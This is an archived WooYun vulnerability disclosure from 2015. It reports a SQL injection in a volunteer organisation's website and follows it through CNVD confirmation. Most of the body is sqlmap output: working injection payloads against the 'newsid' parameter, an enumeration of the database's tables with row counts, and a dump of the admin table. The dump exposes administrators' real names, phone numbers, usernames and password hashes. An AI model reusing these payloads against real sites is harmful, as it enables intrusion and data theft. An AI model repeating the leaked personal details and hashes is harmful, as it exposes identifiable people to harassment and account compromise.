乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-10-30: 厂商已经确认,细节仅向厂商公开 2015-11-09: 细节向核心白帽子及相关领域专家公开 2015-11-19: 细节向普通白帽子公开 2015-11-29: 细节向实习白帽子公开 2015-12-14: 细节向公众公开
RT
链接:http://**.**.**.**/volunteers/ShowPage.aspx?newsid=9938某志愿者网注入漏洞,导致上万志愿者档案泄露(姓名/学校/照片/手机号码/生日/地址等)共17212条记录,分574页,当前为第1页,每页30条
sqlmap identified the following injection points with a total of 0 HTTP(s) requsts:---Place: GETParameter: newsid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newsid=9938' AND 7081=7081 AND 'YNze'='YNze Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: newsid=-1077' UNION ALL SELECT CHAR(58) CHAR(115) CHAR(112) CHAR(9) CHAR(58) CHAR(67) CHAR(102) CHAR(68) CHAR(79) CHAR(109) CHAR(87) CHAR(70) CHA(101) CHAR(77) CHAR(102) CHAR(58) CHAR(119) CHAR(112) CHAR(105) CHAR(58),NULL,NLL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: newsid=9938'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: newsid=9938' WAITFOR DELAY '0:0:5'-----[20:20:20] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[20:20:20] [INFO] fetching tables for database: hds0280121_dbavailable databases [3]:[*] hds0280121_db[*] master[*] tempdbcurrent database: 'hds0280121_db'Database: hds0280121_db[103 tables]+------------------------+| Adminpictemp || Art_Example || Art_board || Art_class || Art_type || D99_CMD || D99_Tmp || Dv_Admin || Dv_BbsLink || Dv_Upfile || Event_Info || Event_Star || Jangli || Post || Userpictemp || VolunteerStar || Volunteers || ad_ads || ad_iplist || ad_weizhi || admin || article || clear || declare_unit || diaodong_info || dnt_admingroups || dnt_adminvisitlog || dnt_advertisements || dnt_announcements || dnt_attachments || dnt_attachpaymentlog || dnt_attachtypes || dnt_banned || dnt_bbcodes || dnt_bonuslog || dnt_creditslog || dnt_debatediggs || dnt_debates || dnt_failedlogins || dnt_favorites || dnt_forumfields || dnt_forumlinks || dnt_forums || dnt_help || dnt_invitation || dnt_locations || dnt_medals || dnt_medalslog || dnt_moderatormanagelog || dnt_moderators || dnt_myattachments || dnt_myposts || dnt_mytopics || dnt_navs || dnt_notices || dnt_online || dnt_onlinelist || dnt_onlinetime || dnt_orders || dnt_paymentlog || dnt_pms || dnt_polloptions || dnt_polls || dnt_postdebatefields || dnt_postid || dnt_posts1 || dnt_ratelog || dnt_scheduledevents || dnt_searchcaches || dnt_smilies || dnt_statistics || dnt_stats || dnt_statvars || dnt_tablelist || dnt_tags || dnt_templates || dnt_topicidentify || dnt_topics || dnt_topictagcaches || dnt_topictags || dnt_topictypes || dnt_trendstat || dnt_userfields || dnt_usergroups || dnt_users || dnt_words || event_images || event_top30 || extentinfo || faq || fire_unit || imgnclass || jubao || link || liuyan || requestService || review || smsSend || sms_recv || sms_send_permission || video || zhiwei || zy_unit |+------------------------+
Database: hds0280121_db+----------------------------+---------+| Table | Entries |+----------------------------+---------+| dbo.dnt_pms | 112717 || dbo.dnt_pms | 112717 || dbo.dnt_userfields | 75860 || dbo.dnt_userfields | 75860 || dbo.dnt_users | 75856 || dbo.dnt_users | 75856 || dbo.dnt_myposts | 61409 || dbo.dnt_myposts | 61409 || dbo.dnt_mytopics | 41301 || dbo.dnt_mytopics | 41301 || dbo.dnt_posts1 | 22052 || dbo.dnt_posts1 | 22052 || dbo.Volunteers | 17212 || dbo.Volunteers | 17212 || dbo.smsSend | 14729 || dbo.smsSend | 14729 || dbo.dnt_scheduledevents | 7168 || dbo.dnt_scheduledevents | 7168 || dbo.dnt_myattachments | 6477 || dbo.dnt_myattachments | 6477 || dbo.dnt_attachments | 6475 || dbo.dnt_attachments | 6475 || dbo.Dv_Upfile | 6466 || dbo.Dv_Upfile | 6466 || dbo.Event_Info | 4916 || dbo.Event_Info | 4916 || dbo.event_images | 4480 || dbo.event_images | 4480 || dbo.article | 3779 || dbo.article | 3779 || dbo.diaodong_info | 3332 || dbo.diaodong_info | 3332 || dbo.dnt_adminvisitlog | 2189 || dbo.dnt_adminvisitlog | 2189 || dbo.dnt_topics | 1988 || dbo.dnt_topics | 1988 || dbo.dnt_onlinetime | 1914 || dbo.dnt_onlinetime | 1914 || dbo.dnt_statvars | 1194 || dbo.dnt_statvars | 1194 || dbo.dnt_trendstat | 947 || dbo.dnt_trendstat | 947 || dbo.sms_recv | 848 || dbo.sms_recv | 848 || dbo.review | 685 || dbo.review | 685 || dbo.faq | 448 || dbo.faq | 448 || dbo.dnt_moderatormanagelog | 199 || dbo.dnt_moderatormanagelog | 199 || dbo.zy_unit | 116 || dbo.zy_unit | 116 || dbo.dnt_smilies | 88 || dbo.dnt_smilies | 88 || dbo.Art_class | 57 |Database: hds0280121_db Table: admin[12 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| id | int || is_checkSmsSend | bit || name | nvarchar || phone | nvarchar || sign | smallint || type | bit || typeidlist | nvarchar || unit_id | int || userid | nvarchar || userpwd | nvarchar || zyunit_id | int || zyzhiweiID | int |+-----------------+----------+Database: hds0280121_dbTable: admin[35 entries]+-----------+-------+------------------+------------------+| userid | name | phone | userpwd |+-----------+-------+------------------+------------------+| rzcch | 陈长红 | <blank> | 49ba59abbe56e057 || chengxf | 成雪峰 | <blank> | c604005a3730fc3c || rzgqj | 管清江 | 18206337801 | 49ba59abbe56e057 || libin | 李彬 | 123456 | 49ba59abbe56e057 || clazy1981 | 临时管理员 | <blank> | 4a927e217360e437 || rzly | 刘艳 | <blank> | 1714190a8d1b7d5d || lslym | 刘永敏 | 06332632262 | 617c8efee38dfd8c || 火凤凰 | 牟宗礼 | 18663060083 | ccc4e939b7a5f140 || chipj | 时培军 | 13563320119 | 9e6cca65f83dcff1 || fireren | 系统管理 | 029-86698115-608 | fe2bce34e966e4a1 | 780218| xcs | 许传升 | <blank> | b7a2eb2fbc258906 || rzxujw | 许加文 | 13963311158 | 7f98517fc9851c0c || xujw | 雪妖 | 0633-8222798 | 7f98517fc9851c0c || yanzj | 闫早俊 | <blank> | eacdf51aa2a5306b || rzyangj | 杨军 | <blank> | 9d8a121ce581499d || rzyuanyy | 袁杨杨 | 3282217 | 49ba59abbe56e057 || tree | 张平丽 | <blank> | 720fc93ed27f97c3 || tree | 张平丽 | <blank> | 720fc93ed27f97c3 |
过滤。。。
危害等级:高
漏洞Rank:10
确认时间:2015-10-30 17:50
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无